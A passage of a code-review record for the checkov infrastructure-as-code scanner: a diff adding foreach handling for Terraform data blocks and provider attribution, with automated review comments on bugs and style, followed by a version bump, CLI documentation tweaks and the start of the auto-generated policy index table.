[], BlockType.MODULE: [], BlockType.DATA: []} # Important for foreach performance, see issue https://github.com/bridgecrewio/checkov/issues/6068 self._vertex_path_to_realpath_cache: Dict[str, str] = {} 
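Review bot: `self.enable_datas_foreach_handling` is read from `CHECKOV_ENABLE_DATAS_FOREACH_HANDLING` with a default of `'False'`, but neither hunk that handles `BlockType.DATA` consults it: `_create_vertices` appends DATA blocks under `self.enable_foreach_handling` alone, and `build_graph` only tests whether `foreach_blocks[BlockType.DATA]` is non-empty. Unless ForeachBuilder (not in this diff) gates on the flag, data-block foreach expansion is on by default and the opt-in env var is inert. Gate at the collection point so the rest of the pipeline never sees ungated DATA entries: `and (block.block_type in (BlockType.MODULE, BlockType.RESOURCE) or (block.block_type == BlockType.DATA and self.enable_datas_foreach_handling))`. `__init__` starts outside the hunk.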
@@ -77,7 +81,7 @@ def build_graph(self, render_variables: bool) -> None: self._build_edges() logging.info(f"[TerraformLocalGraph] created {len(self.edges)} edges") if (self.enable_foreach_handling or self.enable_modules_foreach_handling) \ - and (self.foreach_blocks[BlockType.RESOURCE] or self.foreach_blocks[BlockType.MODULE]): + and (self.foreach_blocks[BlockType.RESOURCE] or self.foreach_blocks[BlockType.MODULE] or self.foreach_blocks[BlockType.DATA]): try: logging.info('[TerraformLocalGraph] start handling foreach') foreach_builder = ForeachBuilder(self) @@ -113,6 +117,10 @@ def update_vertices_fields(self) -> None: # Important to keep those 2 functions together, as the first affects the calculation of the second self._update_vertices_breadcrumbs_and_module_connections() self._update_nested_modules_address() + try: + self._add_provider_attr_to_resources() + except Exception as e: + logging.info(f'Failed to add provider attributes to resources, error: {str(e)}') def _create_vertices(self) -> None: logging.info("Creating vertices") @@ -122,7 +130,7 @@ def _create_vertices(self) -> None: self._add_block_data_to_graph(i, block) if self.enable_foreach_handling and ( checkov.terraform.graph_builder.foreach.consts.FOREACH_STRING in block.attributes or checkov.terraform.graph_builder.foreach.consts.COUNT_STRING in block.attributes) \ - and block.block_type in (BlockType.MODULE, BlockType.RESOURCE): + and block.block_type in (BlockType.MODULE, BlockType.RESOURCE, BlockType.DATA): self.foreach_blocks[block.block_type].append(i) def _add_block_data_to_graph(self, idx: int, block: TerraformBlock) -> None: 
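Review bot: The new `try`/`except Exception` around `self._add_provider_attr_to_resources()` in `update_vertices_fields` logs at INFO and carries on, so any failure in provider resolution leaves resources without `PROVIDER_ADDRESS` and no visible signal in a default log configuration, while the sibling handler in `_connect_module_provider` reports the same class of failure with `logging.warning`. Use the same level and keep the traceback: `logging.warning(f'Failed to add provider attributes to resources, error: {e}', exc_info=True)`. A short comment stating that provider attribution is best-effort, and why it must not abort graph construction, would make the blanket catch intentional rather than accidental. `update_vertices_fields` starts outside the hunk.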
@@ -139,6 +147,102 @@ def _add_block_data_to_graph(self, idx: int, block: TerraformBlock) -> None: self.in_edges[idx] = [] self.out_edges[idx] = [] + def _add_provider_attr_to_resources(self) -> None: + """ + Assign provider attributes to resource vertices in the Terraform configuration. + + This function iterates through all vertices, and for each vertex that is of the + `RESOURCE` block type, it attempts to determine and assign the appropriate + provider based on the vertex's attributes and the module's temporary Terraform + definitions. + + The function performs the following steps: + 1. Iterates over each vertex in `self.vertices`. + 2. Checks if the vertex's `block_type` is `RESOURCE`. + 3. Determines the path for the Terraform definition. + 4. Checks for the presence of a provider in the vertex's attributes. + 5. If no provider is found, checks in the module's temporary Terraform definition. + 6. If still no provider is found, iterates through nested modules to find a provider. + 7. Assigns the provider fields to the vertex once a provider is determined. 
+ """ + for vertex in self.vertices: + if vertex.block_type == BlockType.RESOURCE: + path_for_tf_definition = TFDefinitionKey(file_path=vertex.path, tf_source_modules=vertex.source_module_object) + if BlockType.PROVIDER in vertex.attributes: + provider = self._get_the_default_provider(vertex.attributes[BlockType.PROVIDER], path_for_tf_definition) + self._assign_provider_fields(vertex, provider) + elif BlockType.PROVIDER in self.module.temp_tf_definition.get(path_for_tf_definition, {}): + provider_name = self._get_the_default_provider(self.module.temp_tf_definition.get(path_for_tf_definition, {}).get(BlockType.PROVIDER, []), path_for_tf_definition, is_same_file=True) + v_name = vertex.name.split('.') + provider_name = vertex.config[v_name[0]][v_name[1]][CustomAttributes.TF_RESOURCE_ADDRESS].replace(vertex.name, provider_name) + self._assign_provider_fields(vertex, provider_name) + else: + while path_for_tf_definition.tf_source_modules: + if self.module.temp_tf_definition and path_for_tf_definition.tf_source_modules and BlockType.PROVIDER in self.module.temp_tf_definition.get(path_for_tf_definition, ''): + module = [m for m in self.module.temp_tf_definition.get(path_for_tf_definition).get(BlockType.MODULE) if list(m.keys())[0] == vertex.source_module_object.name] # type:ignore + provider_name = self._get_the_default_provider(self.module.temp_tf_definition.get(TFDefinitionKey(path_for_tf_definition.tf_source_modules.path), {}).get(BlockType.PROVIDER, []), path_for_tf_definition, module=module) + self._assign_provider_fields(vertex, provider_name) + break + elif path_for_tf_definition.tf_source_modules and BlockType.PROVIDER in self.module.temp_tf_definition.get(TFDefinitionKey(path_for_tf_definition.tf_source_modules.path), {}): + if vertex.source_module_object and vertex.source_module_object.nested_tf_module: + module = [m for m in self.module.temp_tf_definition.get(TFDefinitionKey(path_for_tf_definition.tf_source_modules.path)).get(BlockType.MODULE) if 
list(m.keys())[0] == vertex.source_module_object.nested_tf_module.name] # type:ignore + provider_name = self._get_the_default_provider(self.module.temp_tf_definition.get(TFDefinitionKey(path_for_tf_definition.tf_source_modules.path), {}).get(BlockType.PROVIDER, []), path_for_tf_definition, module=module) + self._assign_provider_fields(vertex, provider_name) + else: + module = [m for m in self.module.temp_tf_definition.get(TFDefinitionKey(path_for_tf_definition.tf_source_modules.path)).get(BlockType.MODULE) if list(m.keys())[0] == vertex.source_module_object.name] # type:ignore + provider_name = self._get_the_default_provider(self.module.temp_tf_definition.get(TFDefinitionKey(path_for_tf_definition.tf_source_modules.path), {}).get(BlockType.PROVIDER, []), path_for_tf_definition, module=module) + self._assign_provider_fields(vertex, provider_name) + break + else: + path_for_tf_definition = TFDefinitionKey(tf_source_modules=path_for_tf_definition.tf_source_modules.nested_tf_module, file_path=path_for_tf_definition.tf_source_modules.path) + + @staticmethod + def _assign_provider_fields(vertex: TerraformBlock, provider_name: str) -> None: + vertex.attributes[CustomAttributes.PROVIDER_ADDRESS] = provider_name + v_name = vertex.name.split('.') + vertex.config[v_name[0]][v_name[1]][CustomAttributes.PROVIDER_ADDRESS] = provider_name + + def _get_provider_address(self, path_for_tf_definition: TFDefinitionKeyType) -> list[int] | None: + if isinstance(path_for_tf_definition, TFDefinitionKey): + return self.vertices_by_module_dependency[path_for_tf_definition.tf_source_modules].get(BlockType.PROVIDER) + return None + + def _get_the_default_provider( + self, + providers: list[dict[str, dict[str, Any]] | str], + path_for_tf_definition: TFDefinitionKeyType, + module: Optional[list[dict[str, Any]]] = None, + is_same_file: bool = False + ) -> str: + provider_address = self._get_provider_address(path_for_tf_definition) + if module and len(module) > 0: + module_providers = 
module[0][list(module[0].keys())[0]].get('providers', [''])[0] + if module_providers: + for _, m_alias in module_providers.items(): + if not provider_address: + return cast(str, module_providers[list(module_providers.keys())[0]].replace(DOLLAR_PREFIX, "").replace(LEFT_CURLY, "").replace(RIGHT_CURLY, "")) + else: + for p_address in provider_address: + if m_alias.replace(DOLLAR_PREFIX, "").replace(LEFT_CURLY, "").replace(RIGHT_CURLY, "") == self.vertices[p_address].name: + return cast(str, self.vertices[p_address].config[list(self.vertices[p_address].config)[0]].get(CustomAttributes.TF_RESOURCE_ADDRESS)) + + if isinstance(providers[0], str): + for provider in providers: + if provider_address: + for address in provider_address: + if self.vertices[address].name == provider: + return cast(str, self.vertices[address].config[list(self.vertices[address].config)[0]].get(CustomAttributes.TF_RESOURCE_ADDRESS)) + else: + for provider in providers: + provider_name = list(provider.keys())[0] # type:ignore + if 'alias' not in provider[provider_name]: + if provider_address and not is_same_file: + for p_address in provider_address: + if self.vertices[p_address].name == provider_name: + return cast(str, self.vertices[p_address].config[list(self.vertices[p_address].config.keys())[0]][CustomAttributes.TF_RESOURCE_ADDRESS]) + return f'{provider_name}.default' + return '' + def _arrange_graph_data(self) -> None: # reset all the relevant data self.vertices_by_block_type = defaultdict(list) 
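Review bot: `_get_the_default_provider` evaluates `providers[0]` unguarded, and at least one caller can pass an empty list: in the `while` loop of `_add_provider_attr_to_resources` the first branch tests `BlockType.PROVIDER in self.module.temp_tf_definition.get(path_for_tf_definition, '')` but then fetches the providers from a different key, `TFDefinitionKey(path_for_tf_definition.tf_source_modules.path)`, with `.get(BlockType.PROVIDER, [])`, so an IndexError is reachable and is only hidden by the blanket `except Exception` in the caller. Add a guard at the top of the function, `if not providers: return ''`, and use the same key in the membership test and in the lookup. The same shape recurs in `.get('providers', [''])[0]`, which raises on an explicit empty `providers = []` in a module call, and in `.get(path_for_tf_definition).get(BlockType.MODULE)` with no default, which yields `None` for a file without module blocks and then fails inside the list comprehension. The roughly forty-line `while` body repeats the "find the module entry, fetch its providers, assign" sequence three times with different keys; a helper that resolves one `(definition key, module name)` pair per iteration would make the three cases, and the `# type:ignore` markers they need, visibly the same thing.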
@@ -209,7 +313,7 @@ def _build_edges_for_vertex(self, origin_node_index: int, vertex: TerraformBlock resources_types=resources_types, ) for vertex_reference in referenced_vertices: - # for certain blocks such as data and resource, the block name is composed from several parts. + # for certain blocks such as data and resource, the block name is composed of several parts. # the purpose of the loop is to avoid not finding the node if the name has several parts sub_values = [remove_index_pattern_from_str(sub_value) for sub_value in vertex_reference.sub_parts] for i in range(len(sub_values)): @@ -302,6 +406,8 @@ def _get_target_variables(self, vertex: TerraformBlock, dest_module_path: str) - def _connect_module_provider(self) -> None: for origin_node_index, referenced_vertices in self.out_edges.items(): + if not referenced_vertices: + continue vertex = self.vertices[origin_node_index] # if we have an edge of module->provider we need to connect that modules' resources to the provider if vertex.block_type == BlockType.MODULE: @@ -320,7 +426,6 @@ def _connect_module_provider(self) -> None: for e in referenced_vertices: if self.vertices[e.dest].block_type == BlockType.PROVIDER: for resource in resources: - # connect resource to provider self.create_edge(resource, e.dest, e.label) except Exception as e: logging.warning(f"Failed in connecting module resources to provider due to {e}") @@ -452,7 +557,7 @@ def _find_vertex_index_relative_to_path( module_dependency_by_name_key = vertex.source_module_object # important to use this specific map for big graph performance - possible_vertices = self.vertices_by_module_dependency_by_name.get(module_dependency_by_name_key, {}).get(block_type, {}).get(name, []) + possible_vertices = self._get_possible_vertices(module_dependency_by_name_key, block_type, name) for vertex_index in possible_vertices: vertex = self.vertices[vertex_index] if self.get_dirname(vertex.path) == self.get_dirname(block_path): 
@@ -464,6 +569,12 @@ def _find_vertex_index_relative_to_path( relative_vertex = self._find_vertex_with_best_match(relative_vertices, block_path, origin_vertex_index) return relative_vertex + def _get_possible_vertices(self, module_dependency_by_name_key: TFModule | None, block_type: str, name: str) -> list[int]: + possible_vertices = self.vertices_by_module_dependency_by_name.get(module_dependency_by_name_key, {}).get(block_type, {}).get(name, []) + if possible_vertices: + return possible_vertices + return self.vertices_by_module_dependency_by_name.get(module_dependency_by_name_key, {}).get(block_type, {}).get(name.replace(LEFT_BRACKET_WITH_QUOTATION, LEFT_BRACKET).replace(RIGHT_BRACKET_WITH_QUOTATION, RIGHT_BRACKET), []) + def _find_vertex_with_best_match(self, relevant_vertices_indexes: List[int], origin_path: str, origin_vertex_index: Optional[int] = None) -> int: vertex_index_with_longest_common_prefix = -1 @@ -799,4 +910,5 @@ def update_list_attribute( def get_vertex_as_tf_module(block: TerraformBlock) -> TFModule: - return TFModule(block.path, block.name, block.source_module_object) + block_name = get_sanitized_terraform_resource_id(block.name) + return TFModule(path=block.path, name=block_name, nested_tf_module=block.source_module_object, foreach_idx=block.for_each_index) diff --git a/checkov/terraform/graph_builder/utils.py b/checkov/terraform/graph_builder/utils.py index 66918d964b5..c4f3b7318b6 100644 --- a/checkov/terraform/graph_builder/utils.py +++ b/checkov/terraform/graph_builder/utils.py 
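Review bot: `_get_possible_vertices` spells the same three-level `.get` chain twice and has no docstring explaining why a second lookup with `["` normalised to `[` is needed, which is the non-obvious part (the renderer.py hunk in this commit does the identical normalisation inline). Resolve the per-name map once and try both spellings against it, with the reason on the fallback, e.g. `# references may spell a foreach key as ["key"] while the vertex name uses [key]`. If the normalisation is needed in two files, a small shared helper next to `get_sanitized_terraform_resource_id` in foreach/utils.py would keep the two call sites in sync.
```python
    def _get_possible_vertices(self, module_dependency_by_name_key: TFModule | None, block_type: str, name: str) -> list[int]:
        """Return vertex indexes for `name`, retrying with `["key"]` normalised to `[key]`."""
        by_name = self.vertices_by_module_dependency_by_name.get(module_dependency_by_name_key, {}).get(block_type, {})
        # references may spell a foreach key as ["key"] while the vertex name uses [key]
        normalised = name.replace(LEFT_BRACKET_WITH_QUOTATION, LEFT_BRACKET).replace(RIGHT_BRACKET_WITH_QUOTATION, RIGHT_BRACKET)
        return by_name.get(name) or by_name.get(normalised, [])
```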
@@ -173,6 +173,11 @@ def remove_index_pattern_from_str(str_value: str) -> str: # otherwise it can't be accessed via index return str_value + # Workaround for cases where the string value contains a map attribute access for foreach data block + # UT for this - `test_foreach_data_with_resource` -> /variable_rendering/test_foreach_renderer.py + if "data." in str_value: + return str_value + str_value = re.sub(INDEX_PATTERN, "", str_value) str_value = str_value.replace('["', CHECKOV_LOREM_IPSUM_VAL).replace("[", " [ ").replace(CHECKOV_LOREM_IPSUM_VAL, '["') str_value = str_value.replace('"]', CHECKOV_LOREM_IPSUM_VAL).replace("]", " ] ").replace(CHECKOV_LOREM_IPSUM_VAL, '"]') @@ -258,7 +263,6 @@ def get_referenced_vertices_in_str_value( str_value = remove_function_calls_from_str(str_value=str_value) str_value = remove_index_pattern_from_str(str_value=str_value) - str_value = replace_map_attribute_access_with_dot(str_value=str_value) str_value = remove_interpolation(str_value=str_value) references_vertices = get_vertices_references(str_value, aliases, resources_types) diff --git a/checkov/terraform/graph_builder/variable_rendering/renderer.py b/checkov/terraform/graph_builder/variable_rendering/renderer.py index 0215e1901e9..18326591a1e 100644 --- a/checkov/terraform/graph_builder/variable_rendering/renderer.py +++ b/checkov/terraform/graph_builder/variable_rendering/renderer.py @@ -236,6 +236,8 @@ def find_path_from_referenced_vertices( name = ".".join(copy_of_attribute_path[: i + 1]) if vertex_attributes[CustomAttributes.BLOCK_NAME] == name: return attribute_path, vertex_reference.origin_value + elif vertex_attributes[CustomAttributes.BLOCK_NAME] == name.replace(LEFT_BRACKET_WITH_QUOTATION, LEFT_BRACKET).replace(RIGHT_BRACKET_WITH_QUOTATION, RIGHT_BRACKET): + return attribute_path, vertex_reference.origin_value elif block_type == BlockType.MODULE: copy_of_attribute_path.reverse() for i, _ in enumerate(copy_of_attribute_path): 
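Review bot: The early return `if "data." in str_value: return str_value` is a plain substring test, so any value whose text merely contains the characters `data.` — `local.metadata.name`, `var.userdata.script`, or an attribute path through a `metadata` block — now skips index-pattern removal entirely, not only references to a foreach data block. Anchor the test to a reference that begins with the `data` block type, e.g. `if re.search(r'(^|[^\w.])data\.', str_value): return str_value` (`re` is already used two lines below), or better handle `[...]` on data references explicitly instead of skipping the whole normalisation. The comment should then state what input the exemption is for, rather than only naming the unit test that exercises it. `remove_index_pattern_from_str` starts outside the hunk.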
@@ -363,6 +365,9 @@ def _process_dynamic_blocks(dynamic_blocks: list[dict[str, Any]] | dict[str, Any dynamic_arguments: list[str] = [] TerraformVariableRenderer._extract_dynamic_arguments(block_name, block_content, dynamic_arguments, []) + if not dynamic_arguments and len(dynamic_values) == 1: + for argument, _ in block_content.items(): + dynamic_arguments.append(argument) if dynamic_arguments and isinstance(dynamic_values, list): block_confs = [] for dynamic_value in dynamic_values: diff --git a/checkov/terraform/tf_parser.py b/checkov/terraform/tf_parser.py index 9be746d5950..2f8893286c4 100644 --- a/checkov/terraform/tf_parser.py +++ b/checkov/terraform/tf_parser.py @@ -48,6 +48,7 @@ def __init__(self, module_class: type[Module] = Module) -> None: self.module_address_map: Dict[Tuple[str, str], str] = {} self.loaded_files_map: dict[str, dict[str, list[dict[str, Any]]] | None] = {} self.external_variables_data: list[tuple[str, Any, str]] = [] + self.temp_tf_definition: dict[str, Any] = {} def _init(self, directory: str, out_evaluations_context: Dict[TFDefinitionKey, Dict[str, EvaluationContext]] | None, @@ -461,6 +462,7 @@ def parse_hcl_module_from_tf_definitions( ) self.add_tfvars(module, source) copy_of_tf_definitions = pickle_deepcopy(tf_definitions) + module.temp_tf_definition = tf_definitions # type:ignore # will be TFDefinitionKey and not string for file_path, blocks in copy_of_tf_definitions.items(): for block_type in blocks: try: @@ -699,13 +701,15 @@ def load_or_die_quietly( file: str | Path | os.DirEntry[str], parsing_errors: dict[str, Exception], clean_definitions: bool = True ) -> Optional[_Hcl2Payload]: """ -Load JSON or HCL, depending on filename. + Load JSON or HCL, depending on filename. :return: None if the file can't be loaded """ - file_path = os.fspath(file) file_name = os.path.basename(file_path) + if file_name.endswith('.tfvars'): + clean_definitions = False + try: logging.debug(f"Parsing {file_path}") 
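Review bot: `for argument, _ in block_content.items(): dynamic_arguments.append(argument)` iterates `.items()` but only uses the keys; iterating the mapping directly is the idiom and collapses the loop to one line, `dynamic_arguments.extend(block_content)`. The new branch changes behaviour in the case where no argument references the dynamic iterator but exactly one value exists, treating every argument as dynamic; a one-line comment on why that case is safe would save the next reader a trip to the tests. `_process_dynamic_blocks` starts outside the hunk.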
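Review bot: `module.temp_tf_definition = tf_definitions` stores the original mapping while the loop directly below iterates `copy_of_tf_definitions`; if that loop mutates `tf_definitions` in place (presumably the reason the deepcopy exists), the module ends up holding the mutated structure rather than a snapshot of the parsed input, which matters because `_add_provider_attr_to_resources` reads it later from `update_vertices_fields`. If a snapshot is the intent, assign the copy or take a separate `pickle_deepcopy`; if aliasing is the intent, say so in place of the `# type:ignore` comment. In `load_or_die_quietly`, the new `.tfvars` check silently overrides a caller's `clean_definitions=True`; record that in the docstring, e.g. `:param clean_definitions: ignored for .tfvars files, which are never cleaned`. `parse_hcl_module_from_tf_definitions` starts outside the hunk.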
diff --git a/checkov/version.py b/checkov/version.py
index e51c2d88da4..a6c7e795449 100644
--- a/checkov/version.py
+++ b/checkov/version.py
@@ -1 +1 @@
-version = '3.2.79'
+version = '3.2.125'
diff --git a/docs/2.Basics/CLI Command Reference.md b/docs/2.Basics/CLI Command Reference.md
index 6120d3ab08a..728abeb48e0 100644
--- a/docs/2.Basics/CLI Command Reference.md
+++ b/docs/2.Basics/CLI Command Reference.md
@@ -55,10 +55,11 @@ nav_order: 2 | `--output-baseline-as-skipped` | Output checks that are skipped due to baseline file presence | | `--skip-cve-package SKIP_CVE_PACKAGE` | Filter scan to run on all packages but a specific package identifier (deny list), You can specify this argument multiple times to skip multiple packages | | `--policy-metadata-filter POLICY_METADATA_FILTER` | Comma separated key:value string to filter policies based on Prisma Cloud policy metadata. See https://prisma.pan.dev/api/cloud/cspm/policy#operation/get-policy-filters-and-options for information on allowed filters. Format: policy.label=test,cloud.type=aws | -| `--summary-position` {`top`, `bottom`} | Chose whether the summary will be appended on top (before the checks results) or on bottom (after check results), default is on top. | +| `--summary-position` {`top`, `bottom`} | Choose whether the summary will be appended on top (before the checks results) or on bottom (after check results), default is on top. | | `--no-fail-on-crash ` | Return exit code 0 instead of 2 which indicates a failure in the integration with the platform | | `--enable-secret-scan-all-files CKV_SECRETS_SCAN_ENABLE_ALL` | Enable secret scan to scan all type of file | | `--scan-secrets-history` | Enable secret scan history of commits | | `--block-list-secret-scan CKV_SECRETS_SCAN_BLOCK_LIST` | List of files to filter out in the secret scanner | | `--support` | Enable debug logs and upload the logs to the server. Requires a Prisma Cloud API key. | | `--openai-api-key` | Add an OpenAI API key to enhance finding guidelines by sending violated policies and resource code to OpenAI to request remediation guidance. This will use your OpenAI credits. Set your number of findings that will receive enhanced guidelines using CKV_OPENAI_MAX_FINDINGS | +| env variable: `RENDER_EDGES_DUPLICATE_ITER_COUNT` | Set the threshold to break out of calculating duplicate edges in the graph. 
This can be determined if you see `Reached too many edge duplications...` in the Checkov logs. Default: `4`. |
diff --git a/docs/5.Policy Index/all.md b/docs/5.Policy Index/all.md
index 726323eb244..6e05eae28fa 100644
--- a/docs/5.Policy Index/all.md
+++ b/docs/5.Policy Index/all.md
@@ -6,3709 +6,3779 @@ nav_order: 1 # all resource scans (auto generated) -| | Id | Type | Entity | Policy | IaC | Resource Link | -|------|--------------------------|----------------------------------|--------------------------------------------------------------------------------------------------|----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------|-------------------------|--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------| -| 0 | CKV2_ADO_1 | resource | azuredevops_branch_policy_min_reviewers | Ensure at least two approving reviews for PRs | Terraform | [ADORepositoryHasMinTwoReviewers.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azuredevops/ADORepositoryHasMinTwoReviewers.yaml) | -| 1 | CKV2_ADO_1 | resource | azuredevops_git_repository | Ensure at least two approving reviews for PRs | Terraform | [ADORepositoryHasMinTwoReviewers.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azuredevops/ADORepositoryHasMinTwoReviewers.yaml) | -| 2 | CKV_ALI_1 | resource | alicloud_oss_bucket | Alibaba Cloud OSS bucket accessible to public | Terraform | [OSSBucketPublic.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/OSSBucketPublic.py) | -| 3 | CKV_ALI_2 | resource | alicloud_security_group_rule | Ensure no security groups allow ingress from 0.0.0.0:0 to port 22 | Terraform | [SecurityGroupUnrestrictedIngress22.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/SecurityGroupUnrestrictedIngress22.py) | -| 4 | CKV_ALI_3 | resource | alicloud_security_group_rule | Ensure no 
security groups allow ingress from 0.0.0.0:0 to port 3389 | Terraform | [SecurityGroupUnrestrictedIngress3389.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/SecurityGroupUnrestrictedIngress3389.py) | -| 5 | CKV_ALI_4 | resource | alicloud_actiontrail_trail | Ensure Action Trail Logging for all regions | Terraform | [ActionTrailLogAllRegions.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/ActionTrailLogAllRegions.py) | -| 6 | CKV_ALI_5 | resource | alicloud_actiontrail_trail | Ensure Action Trail Logging for all events | Terraform | [ActionTrailLogAllEvents.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/ActionTrailLogAllEvents.py) | -| 7 | CKV_ALI_6 | resource | alicloud_oss_bucket | Ensure OSS bucket is encrypted with Customer Master Key | Terraform | [OSSBucketEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/OSSBucketEncryptedWithCMK.py) | -| 8 | CKV_ALI_7 | resource | alicloud_disk | Ensure disk is encrypted | Terraform | [DiskIsEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/DiskIsEncrypted.py) | -| 9 | CKV_ALI_8 | resource | alicloud_disk | Ensure Disk is encrypted with Customer Master Key | Terraform | [DiskEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/DiskEncryptedWithCMK.py) | -| 10 | CKV_ALI_9 | resource | alicloud_db_instance | Ensure database instance is not public | Terraform | [RDSIsPublic.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/RDSIsPublic.py) | -| 11 | CKV_ALI_10 | resource | alicloud_oss_bucket | Ensure OSS bucket has versioning enabled | Terraform | 
[OSSBucketVersioning.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/OSSBucketVersioning.py) | -| 12 | CKV_ALI_11 | resource | alicloud_oss_bucket | Ensure OSS bucket has transfer Acceleration enabled | Terraform | [OSSBucketTransferAcceleration.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/OSSBucketTransferAcceleration.py) | -| 13 | CKV_ALI_12 | resource | alicloud_oss_bucket | Ensure the OSS bucket has access logging enabled | Terraform | [OSSBucketAccessLogs.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/OSSBucketAccessLogs.py) | -| 14 | CKV_ALI_13 | resource | alicloud_ram_account_password_policy | Ensure RAM password policy requires minimum length of 14 or greater | Terraform | [RAMPasswordPolicyLength.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/RAMPasswordPolicyLength.py) | -| 15 | CKV_ALI_14 | resource | alicloud_ram_account_password_policy | Ensure RAM password policy requires at least one number | Terraform | [RAMPasswordPolicyNumber.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/RAMPasswordPolicyNumber.py) | -| 16 | CKV_ALI_15 | resource | alicloud_ram_account_password_policy | Ensure RAM password policy requires at least one symbol | Terraform | [RAMPasswordPolicySymbol.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/RAMPasswordPolicySymbol.py) | -| 17 | CKV_ALI_16 | resource | alicloud_ram_account_password_policy | Ensure RAM password policy expires passwords within 90 days or less | Terraform | [RAMPasswordPolicyExpiration.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/RAMPasswordPolicyExpiration.py) | -| 18 | CKV_ALI_17 | resource | alicloud_ram_account_password_policy | Ensure RAM password policy requires 
at least one lowercase letter | Terraform | [RAMPasswordPolicyLowercaseLetter.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/RAMPasswordPolicyLowercaseLetter.py) | -| 19 | CKV_ALI_18 | resource | alicloud_ram_account_password_policy | Ensure RAM password policy prevents password reuse | Terraform | [RAMPasswordPolicyReuse.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/RAMPasswordPolicyReuse.py) | -| 20 | CKV_ALI_19 | resource | alicloud_ram_account_password_policy | Ensure RAM password policy requires at least one uppercase letter | Terraform | [RAMPasswordPolicyUppcaseLetter.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/RAMPasswordPolicyUppcaseLetter.py) | -| 21 | CKV_ALI_20 | resource | alicloud_db_instance | Ensure RDS instance uses SSL | Terraform | [RDSInstanceSSL.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/RDSInstanceSSL.py) | -| 22 | CKV_ALI_21 | resource | alicloud_api_gateway_api | Ensure API Gateway API Protocol HTTPS | Terraform | [APIGatewayProtocolHTTPS.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/APIGatewayProtocolHTTPS.py) | -| 23 | CKV_ALI_22 | resource | alicloud_db_instance | Ensure Transparent Data Encryption is Enabled on instance | Terraform | [RDSTransparentDataEncryptionEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/RDSTransparentDataEncryptionEnabled.py) | -| 24 | CKV_ALI_23 | resource | alicloud_ram_account_password_policy | Ensure Ram Account Password Policy Max Login Attempts not > 5 | Terraform | [RAMPasswordPolicyMaxLogin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/RAMPasswordPolicyMaxLogin.py) | -| 25 | CKV_ALI_24 | resource | alicloud_ram_security_preference | Ensure RAM 
enforces MFA | Terraform | [RAMSecurityEnforceMFA.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/RAMSecurityEnforceMFA.py) | -| 26 | CKV_ALI_25 | resource | alicloud_db_instance | Ensure RDS Instance SQL Collector Retention Period should be greater than 180 | Terraform | [RDSRetention.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/RDSRetention.py) | -| 27 | CKV_ALI_26 | resource | alicloud_cs_kubernetes | Ensure Kubernetes installs plugin Terway or Flannel to support standard policies | Terraform | [K8sEnableNetworkPolicies.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/K8sEnableNetworkPolicies.py) | -| 28 | CKV_ALI_27 | resource | alicloud_kms_key | Ensure KMS Key Rotation is enabled | Terraform | [KMSKeyRotationIsEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/KMSKeyRotationIsEnabled.py) | -| 29 | CKV_ALI_28 | resource | alicloud_kms_key | Ensure KMS Keys are enabled | Terraform | [KMSKeyIsEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/KMSKeyIsEnabled.py) | -| 30 | CKV_ALI_29 | resource | alicloud_alb_acl_entry_attachment | Alibaba ALB ACL does not restrict Access | Terraform | [ALBACLIsUnrestricted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/ALBACLIsUnrestricted.py) | -| 31 | CKV_ALI_30 | resource | alicloud_db_instance | Ensure RDS instance auto upgrades for minor versions | Terraform | [RDSInstanceAutoUpgrade.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/RDSInstanceAutoUpgrade.py) | -| 32 | CKV_ALI_31 | resource | alicloud_cs_kubernetes_node_pool | Ensure K8s nodepools are set to auto repair | Terraform | 
